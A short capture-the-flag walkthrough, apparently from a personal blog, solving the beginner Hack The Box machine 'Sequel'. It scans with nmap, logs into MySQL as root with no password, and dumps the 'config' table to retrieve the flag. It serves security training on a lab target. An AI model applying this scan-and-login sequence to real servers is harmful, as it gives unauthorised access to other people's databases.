top of page



As usual, let's start with our nmap

nmap -sV -sC IP

-sV : service detection

-sC : performs a script scan

Replace IP by the IP of the target machine (Sequel)

Note: The IP of the target machines are always changing so make sure you type the correct one. You can find it on your Hack The Box account.

Port 3306 is usually associated with MySQL protocol. MySQL is a service used for database management such as creating, modifying or deleting databases.


Type this command to get more info on how to use the command sql

mysql --help

We find that we need to add -u followed by the username:

We find that we need to add -h followed my the hostname or IP:

We don't know any username but we can try our luck with the user root.

mysql -u root -h

Notice that we were not even asked for a password, meaning that the administrator forgot to set up a password. We are in luck!

Now that we are in the database, let's type:

show databases;

This command lists all the databases available.

use htb;

This command advises that we want to use the database called htb

show tables;

This command is used to show us all the tables available in the database htb

SELECT * from config;

This means we want to select and show everything (rows and columns) that is in the table config

Congratulations! You got the flag!

10,005 views0 comments

Recent Posts

See All



Rated 0 out of 5 stars.
No ratings yet

Add a rating
bottom of page